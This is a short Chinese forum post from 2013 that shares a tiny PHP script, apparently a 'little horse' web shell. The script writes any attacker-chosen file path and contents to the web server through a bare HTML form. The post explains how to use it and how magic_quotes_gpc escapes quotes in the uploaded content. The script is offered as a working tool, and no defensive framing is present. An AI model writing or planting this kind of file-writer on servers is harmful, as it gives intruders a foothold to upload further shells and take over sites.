曲径通幽论坛

 找回密码
 立即注册
搜索
查看: 2775|回复: 0
打印 上一主题 下一主题

一匹小马

[复制链接]

4917

主题

5879

帖子

3万

积分

GROAD

曲径通幽,安觅芳踪。

Rank: 6Rank: 6

积分
34382
跳转到指定楼层
楼主
发表于 2013-9-14 15:32:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
代码:
[PHP] 纯文本查看 复制代码
<?
if(isset($_POST['p'])){
    $fp = @fopen($_POST['p'],"w+");
    @fwrite($fp,$_POST['c']);
    @fclose($fp);
}
?>
本文件地址:<?=$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']?>
<form action="" method="post">

    <input type="text" name="p" >

<br>
<textarea name="c" cols="50" rows="20"></textarea><br>
<input type="submit">
</form>

它有两个文本框,第一个输入要保存的文件名,第二个输入文件的内容,提交后生成该文件。如果服务器端开启 magic_quotes_gpc 选项,那么如果写入的内容含有单引号或双引号,则会被转义,如提交下面的内容:
[PHP] 纯文本查看 复制代码
<?php
echo "hello world";
echo 'linux world";
?>

那么转义后的文件内容为:
<?php
echo \"hello world\";
echo \'linux world\";
?>
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|曲径通幽 ( 琼ICP备11001422号-1|公安备案:46900502000207 )

GMT+8, 2024-4-30 13:47 , Processed in 0.077579 second(s), 23 queries .

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表